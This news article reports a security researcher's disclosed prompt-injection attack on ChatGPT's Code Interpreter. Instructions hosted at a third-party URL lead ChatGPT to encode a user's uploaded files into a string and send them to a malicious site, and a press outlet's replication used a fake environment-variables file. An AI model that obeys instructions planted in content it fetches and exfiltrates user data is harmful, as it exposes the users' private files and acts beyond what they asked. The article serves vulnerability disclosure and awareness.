ChatGPT's new code interpreting tool could become a hacker's paradise. Here's how.

ChatGPT privacy settings
(Image credit: Future)

What you need to know

  • ChatGPT Plus members can now access a code interpreting tool with sophisticated coding capabilities, including writing Python code by leveraging AI capabilities and running it in a sandboxed environment.
  • A security expert has disclosed that the new feature potentially poses a significant security threat to users.
  • Running the code in a sandbox environment heightens the chances of hackers maliciously accessing your data.
  • The technique involves tricking ChatGPT into executing instructions from a third-party URL, prompting it to encode uploaded files into a string, and sending this information to a malicious site. 

For a while now, we've known ChatGPT can achieve incredible things and make work easier for users, from developing software in under 7 minutes to solving complex math problems and more. While it's already possible to write code using the tool, OpenAI recently debuted a new Code Interpreter tool, making the process more seamless.

According to Tom's Hardware and cybersecurity expert Johann Rehberger, the tool writes Python code by leveraging AI capabilities and even runs it in a sandboxed environment. And while this is an incredible feat, the sandboxed environment bit is a hornet's nest bred with attackers. 

This is mainly because it's also used to handle any spreadsheets. You might need ChatGPT to analyze and present the data in the form of charts, ultimately making it susceptible to malicious ploys by hackers.

How do hackers leverage this vulnerability?

Per Johann Rehberger's findings and Tom's Hardware's in-depth tests and analysis, the technique involves duping the AI-powered chatbot into executing instructions from a third-party URL. This allows it to encode uploaded files into a string that sends the information to a malicious site. 

This is highly concerning even though this technique calls for particular conditions. You'll also require a ChatGPT Plus subscription to access the code-interpreting tool.

RELATED: OpenAI temporarily restricts new sign-ups for its ChatGPT Plus service

While running tests and trying to replicate this technique, Tom's Hardware tried to determine the extent of this vulnerability by creating a fake environment variables file and leveraging ChatGPT's capabilities to process and send this data to an external malicious site.

Considering this, the uploads are initiated on a new Linux virtual machine with a dedicated directory structure. While ChatGPT might not provide a command line, it responds to Linux commands, thus allowing users to access the information and files. Through this avenue, hackers can manage to access unsuspecting users' data.

Is it possible to completely block hackers from leveraging AI capabilities to deploy attacks on unsuspecting users? Please share your thoughts with us in the comments. 

Kevin Okemwa
Contributor

Kevin Okemwa is a seasoned tech journalist based in Nairobi, Kenya with lots of experience covering the latest trends and developments in the industry at Windows Central. With a passion for innovation and a keen eye for detail, he has written for leading publications such as OnMSFT, MakeUseOf, and Windows Report, providing insightful analysis and breaking news on everything revolving around the Microsoft ecosystem. You'll also catch him occasionally contributing at iMore about Apple and AI. While AFK and not busy following the ever-emerging trends in tech, you can find him exploring the world or listening to music.